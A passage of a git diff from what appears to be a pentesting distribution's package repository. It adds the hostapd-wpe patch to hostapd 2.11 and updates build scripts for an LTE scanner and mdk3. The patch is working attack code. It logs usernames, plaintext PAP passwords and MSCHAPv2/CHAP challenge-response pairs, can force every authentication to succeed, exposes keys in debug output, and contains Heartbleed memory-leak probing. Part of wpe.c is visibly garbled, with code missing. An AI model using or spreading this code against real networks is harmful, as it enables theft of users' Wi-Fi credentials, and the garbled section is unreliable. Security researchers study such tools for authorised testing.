(sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity, + identity_len, phase2, user) != 0) { + eap_user_free(user); +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_mschapv2.c hostapd-2.11-wpe/src/eap_server/eap_server_mschapv2.c +--- hostapd-2.11/src/eap_server/eap_server_mschapv2.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/eap_server/eap_server_mschapv2.c 2024-07-26 09:11:33.204000000 +0000 +@@ -12,7 +12,7 @@ + #include "crypto/ms_funcs.h" + #include "crypto/random.h" + #include "eap_i.h" +- ++#include "wpe/wpe.h" + + struct eap_mschapv2_hdr { + u8 op_code; /* MSCHAPV2_OP_* */ +@@ -296,7 +296,7 @@ static void eap_mschapv2_process_respons + size_t username_len, user_len; + int res; + char *buf; +- ++ u8 wpe_challenge_hash[8]; + pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData, + &len); + if (pos == NULL || len < 1) +@@ -377,6 +377,8 @@ static void eap_mschapv2_process_respons + } + } + #endif /* CONFIG_TESTING_OPTIONS */ ++ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash); ++ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24); + + if (username_len != user_len || + os_memcmp(username, user, username_len) != 0) { +@@ -411,6 +413,11 @@ static void eap_mschapv2_process_respons + return; + } + ++ if (wpe_conf.wpe_enable_return_success) { ++ os_memset((void *)nt_response, 0, 24); ++ os_memset((void *)expected, 0, 24); ++ } ++ + if (os_memcmp_const(nt_response, expected, 24) == 0) { + const u8 *pw_hash; + u8 pw_hash_buf[16], pw_hash_hash[16]; +@@ -451,6 +458,8 @@ static void eap_mschapv2_process_respons + wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response"); + data->state = FAILURE_REQ; + } ++ if (wpe_conf.wpe_enable_return_success) ++ data->state = SUCCESS; + } + + +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_peap.c hostapd-2.11-wpe/src/eap_server/eap_server_peap.c +--- hostapd-2.11/src/eap_server/eap_server_peap.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/eap_server/eap_server_peap.c 2024-07-26 09:11:33.204000000 +0000 +@@ -17,7 +17,7 @@ + #include "eap_common/eap_tlv_common.h" + #include "eap_common/eap_peap_common.h" + #include "tncs.h" +- ++#include "wpe/wpe.h" + + /* Maximum supported PEAP version + * 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_ttls.c hostapd-2.11-wpe/src/eap_server/eap_server_ttls.c +--- hostapd-2.11/src/eap_server/eap_server_ttls.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/eap_server/eap_server_ttls.c 2024-07-26 09:11:33.204000000 +0000 +@@ -16,7 +16,7 @@ + #include "eap_server/eap_tls_common.h" + #include "eap_common/chap.h" + #include "eap_common/eap_ttls.h" +- ++#include "wpe/wpe.h" + + #define EAP_TTLS_VERSION 0 + +@@ -539,9 +539,11 @@ static void eap_ttls_process_phase2_pap( + return; + } + +- if (sm->user->password_len != user_password_len || ++ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len); ++ ++ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len || + os_memcmp_const(sm->user->password, user_password, +- user_password_len) != 0) { ++ user_password_len) != 0)) { + wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password"); + eap_ttls_state(data, FAILURE); + return; +@@ -604,8 +606,9 @@ static void eap_ttls_process_phase2_chap + chap_md5(password[0], sm->user->password, sm->user->password_len, + challenge, challenge_len, hash); + +- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == +- 0) { ++ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len); ++ ++ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) { + wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password"); + eap_ttls_state(data, SUCCESS); + eap_ttls_valid_session(sm, data); +@@ -676,7 +679,9 @@ static void eap_ttls_process_phase2_msch + return; + } + +- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) { ++ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24); ++ ++ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) { + wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response"); + eap_ttls_state(data, SUCCESS); + eap_ttls_valid_session(sm, data); +@@ -698,7 +703,7 @@ static void eap_ttls_process_phase2_msch + u8 *response, size_t response_len) + { + u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge, +- *auth_challenge; ++ *auth_challenge, wpe_challenge_hash[8]; + size_t username_len, i; + + if (challenge == NULL || response == NULL || +@@ -783,6 +788,9 @@ static void eap_ttls_process_phase2_msch + } + + rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8; ++ ++ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash); ++ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24); + #ifdef CONFIG_TESTING_OPTIONS + { + u8 challenge2[8]; +diff '--color=auto' -rupN hostapd-2.11/src/utils/wpa_debug.c hostapd-2.11-wpe/src/utils/wpa_debug.c +--- hostapd-2.11/src/utils/wpa_debug.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/utils/wpa_debug.c 2024-07-26 09:11:33.204000000 +0000 +@@ -28,7 +28,7 @@ static FILE *wpa_debug_tracing_file = NU + + + int wpa_debug_level = MSG_INFO; +-int wpa_debug_show_keys = 0; ++int wpa_debug_show_keys = 1; // WPE >:) + int wpa_debug_timestamp = 0; + int wpa_debug_syslog = 0; + #ifndef CONFIG_NO_STDOUT_DEBUG +diff '--color=auto' -rupN hostapd-2.11/src/wpe/Makefile hostapd-2.11-wpe/src/wpe/Makefile +--- hostapd-2.11/src/wpe/Makefile 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/Makefile 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,8 @@ ++all: ++ @echo Nothing to be made. ++ ++clean: ++ rm -f *~ *.o *.d *.gcno *.gcda *.gcov ++ ++install: ++ @echo Nothing to be made. +diff '--color=auto' -rupN hostapd-2.11/src/wpe/wpe.c hostapd-2.11-wpe/src/wpe/wpe.c +--- hostapd-2.11/src/wpe/wpe.c 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/wpe.c 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,232 @@ ++/* ++ wpe.c - ++ brad.antoniewicz@foundstone.com ++ Implements WPE (Wireless Pwnage Edition) functionality within ++ hostapd. ++ ++ WPE functionality focuses on targeting connecting users. At ++ it's core it implements credential logging (originally ++ implemented in FreeRADIUS-WPE), but also includes other patches ++ for other client attacks that have been modified to some extend. ++ ++ FreeRADIUS-WPE: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/freeradius-wpe ++ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff ++ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd ++*/ ++ ++#include ++#include ++#include "includes.h" ++#include "common.h" ++#include "wpe/wpe.h" ++#include "utils/wpa_debug.h" ++ ++#define wpe_logfile_default_location "./hostapd-wpe.log" ++ ++ ++#define MSCHAPV2_CHAL_HASH_LEN 8 ++#define MSCHAPV2_CHAL_LEN 16 ++#define MSCHAPV2_RESP_LEN 24 ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff"; ++ size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]); ++#endif ++ ++struct wpe_config wpe_conf = { ++ .wpe_logfile = wpe_logfile_default_location, ++ .wpe_logfile_fp = NULL, ++ .wpe_enable_karma = 0, ++ .wpe_enable_cupid = 0, ++ .wpe_enable_return_success = 0, ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ .wpe_hb_send_before_handshake = 1, ++ .wpe_hb_send_before_appdata = 0, ++ .wpe_hb_send_after_appdata = 0, ++ .wpe_hb_payload_size = 50000, ++ .wpe_hb_num_tries = 1, ++ .wpe_hb_num_repeats = 10 ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++}; ++ ++void wpe_log_file_and_stdout(char const *fmt, ...) { ++ ++ if ( wpe_conf.wpe_logfile_fp == NULL ) { ++ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a"); ++ if ( wpe_conf.wpe_logfile_fp == NULL ) ++ printf("WPE: Cannot file log file"); ++ } ++ ++ va_list ap; ++ ++ va_start(ap, fmt); ++ vprintf(fmt, ap); ++ va_end(ap); ++ ++ va_start(ap, fmt); ++ if ( wpe_conf.wpe_logfile_fp != NULL ) ++ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap); ++ va_end(ap); ++} ++ ++void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) { ++ time_t nowtime; ++ int x; ++ ++ nowtime = time(NULL); ++ ++ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime)); ++ wpe_log_file_and_stdout("\t username:\t"); ++ for (x=0; x?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................."; ++ ++ const unsigned short *sp; ++ const unsigned char *ap; ++ unsigned int i, j; ++ int nshorts, nshorts2; ++ int padding; ++ ++ wpe_log_file_and_stdout("\n\t"); ++ padding = 0; ++ sp = (unsigned short *)bp; ++ ap = (unsigned char *)bp; ++ nshorts = (unsigned int)length / sizeof(unsigned short); ++ nshorts2 = (unsigned int)length / sizeof(unsigned short); ++ i = 0; ++ j = 0; ++ while (1) { ++ while (--nshorts >= 0) { ++ wpe_log_file_and_stdout(" %04x", ntohs(*sp)); ++ sp++; ++ if ((++i % 8) == 0) ++ break; ++ } ++ if (nshorts < 0) { ++ if ((length & 1) && (((i - 1) % 8) != 0)) { ++ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp); ++ padding++; ++ } ++ nshorts = (8 - (nshorts2 - nshorts)); ++ while (--nshorts >= 0) { ++ wpe_log_file_and_stdout(" "); ++ } ++ if (!padding) ++ wpe_log_file_and_stdout(" "); ++ } ++ wpe_log_file_and_stdout(" "); ++ ++ while (--nshorts2 >= 0) { ++ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]); ++ ap += 2; ++ if ((++j % 8) == 0) { ++ wpe_log_file_and_stdout("\n\t"); ++ break; ++ } ++ } ++ if (nshorts2 < 0) { ++ if ((length & 1) && (((j - 1) % 8) != 0)) { ++ wpe_log_file_and_stdout("%c", asciify[*ap]); ++ } ++ break; ++ } ++ } ++ if ((length & 1) && (((i - 1) % 8) == 0)) { ++ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp); ++ wpe_log_file_and_stdout(" %c", ++ asciify[*ap]); ++ } ++ wpe_log_file_and_stdout("\n"); ++} ++ ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++/* https://github.com/openssl/openssl/issues/2122 */ ++ ++void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) { ++#ifdef TLS1_RT_HEARTBEAT ++ if (v_content_type == TLS1_RT_HEARTBEAT) { ++#elif defined(DTLS1_RT_HEARTBEAT) ++ if (v_content_type == DTLS1_RT_HEARTBEAT) { ++#endif ++ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n"); ++ v_ssl->tlsext_hb_pending = 1; ++ wpe_hexdump((unsigned char *)v_buf, v_len); ++ } ++} ++ ++ ++char *wpe_hb_clear() { ++ char *p; ++ // set payload size ++ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3]; ++ s2n(wpe_conf.wpe_hb_payload_size, p); ++ ++ return wpe_hb_msg; ++} ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ +diff '--color=auto' -rupN hostapd-2.11/src/wpe/wpe.h hostapd-2.11-wpe/src/wpe/wpe.h +--- hostapd-2.11/src/wpe/wpe.h 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/wpe.h 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,54 @@ ++/* ++ wpe.h - ++ brad.antoniewicz@foundstone.com ++ Implements WPE (Wireless Pwnage Edition) functionality within ++ hostapd. ++ ++ WPE functionality focuses on targeting connecting users. At ++ it's core it implements credential logging (originally ++ implemented in FreeRADIUS-WPE), but also includes other patches ++ for other client attacks. ++ ++ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe ++ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff ++ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd ++*/ ++#include ++ ++struct wpe_config { ++ char *wpe_logfile; ++ FILE *wpe_logfile_fp; ++ unsigned int wpe_enable_karma; ++ unsigned int wpe_enable_cupid; ++ unsigned int wpe_enable_return_success; ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ unsigned int wpe_hb_send_before_handshake:1; ++ unsigned int wpe_hb_send_before_appdata:1; ++ unsigned int wpe_hb_send_after_appdata:1; ++ unsigned int wpe_hb_payload_size; ++ unsigned int wpe_hb_num_tries; ++ unsigned int wpe_hb_num_repeats; ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++}; ++ ++extern struct wpe_config wpe_conf; ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ extern char wpe_hb_msg[]; ++ extern size_t wpe_hb_msg_len; ++ ++ //#define WPE_HB_MSG_LEN 8 ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ ++#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \ ++ (((unsigned int)(c[1])) )),c+=2) ++ ++#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ ++ c[1]=(unsigned char)(((s) )&0xff)),c+=2) ++ ++ ++void wpe_log_file_and_stdout(char const *fmt, ...); ++void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len); ++void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len); ++void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg); ++char *wpe_hb_clear(); diff --git a/packages/pentesting/hostapd-wpe/hostapd-wpe.install b/packages/pentesting/hostapd-wpe/hostapd-wpe.install index b94ab8c6d..f4680b070 100644 --- a/packages/pentesting/hostapd-wpe/hostapd-wpe.install +++ b/packages/pentesting/hostapd-wpe/hostapd-wpe.install @@ -1,20 +1,19 @@ post_install() { cd "/etc/hostapd-wpe/certs" - sed -i -e 's/default_days\s*= 365/default_days = 3650/' client.cnf - sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' client.cnf + sudo sed -i -e 's/default_days\s*= 365/default_days = 3650/' client.cnf + sudo sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' \ + client.cnf - sed -i -e 's/default_days\s*= 365/default_days = 3650/' ca.cnf - sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' ca.cnf - - sed -i -e 's/default_days\s*= 60/default_days = 3650/' server.cnf - sed -i -e 's/default_crl_days\s*= 30/default_crl_days = 3649/' server.cnf + sudo sed -i -e 's/default_days\s*= 365/default_days = 3650/' ca.cnf + sudo sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' ca.cnf + sudo sed -i -e 's/default_days\s*= 60/default_days = 3650/' server.cnf + sudo sed -i -e 's/default_crl_days\s*= 30/default_crl_days = 3649/' server.cnf ./bootstrap make install } post_remove() { rm -rf /etc/hostapd-wpe -} - +} \ No newline at end of file diff --git a/packages/pentesting/lte-cell-scanner/PKGBUILD b/packages/pentesting/lte-cell-scanner/PKGBUILD index 45b09800d..35397a2db 100644 --- a/packages/pentesting/lte-cell-scanner/PKGBUILD +++ b/packages/pentesting/lte-cell-scanner/PKGBUILD @@ -1,33 +1,52 @@ # Credits BlackArch ( https://www.blackarch.org/ ). # See COPYING for license details. +# Initial PKGBUILD from AUR. +# Old Maintainer: Tony Lambiris + pkgname=lte-cell-scanner -pkgver=57.5fa3df8 -pkgrel=2 -groups=('athena' 'athena-scanner' 'athena-mobile' 'athena-recon') -pkgdesc='LTE SDR cell scanner optimized to work with very low performance RF front ends (8bit A/D, 20dB noise figure).' +pkgver=26.e7f71cb +pkgrel=1 +epoch=1 +pkgdesc='An OpenCL accelerated TDD/FDD LTE Scanner.' arch=('x86_64' 'aarch64') -url='https://github.com/Evrytania/LTE-Cell-Scanner' -license=('AGPL') -depends=('itpp' 'boost' 'boost-libs' 'fftw' 'rtl-sdr') -makedepends=('git' 'cmake') -source=("$pkgname::git+https://github.com/Evrytania/LTE-Cell-Scanner.git") +groups=('athena' 'athena-radio' 'athena-mobile' 'athena-scanner') +url='https://github.com/JiaoXianjun/LTE-Cell-Scanner' +license=('GPL') +depends=('git') +makedepends=('cmake' 'hackrf' 'fftw' 'itpp' 'boost' 'boost-libs' 'bladerf') +source=("$pkgname::git+https://github.com/JiaoXianjun/LTE-Cell-Scanner") sha512sums=('SKIP') pkgver() { cd $pkgname - echo $(git rev-list --count HEAD).$(git rev-parse --short HEAD) + ( set -o pipefail + git describe --long --tags --abbrev=7 2>/dev/null | + sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "%s.%s" "$(git rev-list --count HEAD)" \ + "$(git rev-parse --short=7 HEAD)" + ) } -build() { - cd $pkgname +prepare() { + cd $pkgname - mkdir -p build + mkdir -p build +} - cd build +build() { + cd $pkgname + + cd build - cmake .. + cmake ../ \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_INSTALL_PREFIX=/usr \ + -DCMAKE_VERBOSE_MAKEFILE=ON \ + -DUSE_HACKRF=1 \ + -DUSE_BLADERF=1 \ + -DUSE_OPENCL=0 # opencl segfaults in some cases make } @@ -35,8 +54,8 @@ build() { package() { cd $pkgname - install -Dm 755 build/src/CellSearch "$pkgdir/usr/bin/$pkgname" - install -Dm 644 -t "$pkgdir/usr/share/doc/$pkgname/" README AUTHORS doc/* - install -Dm 644 COPYING "$pkgdir/usr/share/licenses/$pkgname/COPYING" + cd build + + make DESTDIR="$pkgdir" install } diff --git a/packages/pentesting/mdk3/PKGBUILD b/packages/pentesting/mdk3/PKGBUILD index f8081a696..1033af6a1 100644 --- a/packages/pentesting/mdk3/PKGBUILD +++ b/packages/pentesting/mdk3/PKGBUILD @@ -1,42 +1,39 @@ # Credits BlackArch ( https://www.blackarch.org/ ). # See COPYING for license details. # -# Old Maintainer: Levente Polyak +# Old Maintainer: BoBeR182 +# Old Contributor: Levente Polyak # Old Contributor: Andrés Cordero # Old Contributor: Jens Pranaitis pkgname=mdk3 pkgver=v6 -pkgrel=9 -pkgdesc='WLAN penetration tool.' +pkgrel=10 +pkgdesc="WLAN penetration tool" groups=('athena' 'athena-wireless' 'athena-fuzzer' 'athena-exploitation') -url='https://aspj.aircrack-ng.org/' -arch=('x86_64' 'aarch64') +url="https://www.kali.org/tools/mdk3/" +arch=("x86_64") license=('GPL2') -depends=('glibc') -#source=("$pkgname-$pkgver.tar.bz2::https://aspj.aircrack-ng.org/$pkgname-$pkgver.tar.bz2") -source=("https://github.com/Wikel/$pkgname-$pkgver/raw/master/$pkgname-$pkgver.tar.bz2") -sha512sums=('a7879e832a7184f85b9b4f591fddb313731a8d8899c98ca3a1f026284bec79018d4ae373d5fd9cc1935915ad848761dc5f865aeca38ca4e13122e9c9f9108c3a') +depends=('glibc' 'aircrack-ng') +source=(https://salsa.debian.org/pkg-security-team/${pkgname}/-/archive/debian/master/${pkgname}-debian-master.tar.bz2) +sha512sums=('79dff994816e78ae1001074f93f266ad7b820cf03c0b2c3e61d9eb73e2a047c9bb912bcfb14f6dec09584c017407bd84fea127a11cc355b5f8a77102ef0ded89') prepare() { - cd "$pkgname-$pkgver" - - sed "s|-g -O3|${CFLAGS}|g" -i Makefile + cd ${pkgname}-debian-master sed 's|sbin|bin|g' -i Makefile } -build() { - cd "$pkgname-$pkgver" +build() { + cd ${pkgname}-debian-master make -C osdep make } package() { - cd "$pkgname-$pkgver" - - make DESTDIR="$pkgdir" PREFIX="/usr" install - - install -Dm 644 docs/*.html -t "$pkgdir/usr/share/doc/$pkgname" + cd ${pkgname}-debian-master + make DESTDIR="${pkgdir}" PREFIX="/usr" install + install -Dm 644 docs/*.html -t "${pkgdir}/usr/share/doc/${pkgname}" } +# vim: ts=2 sw=2 et: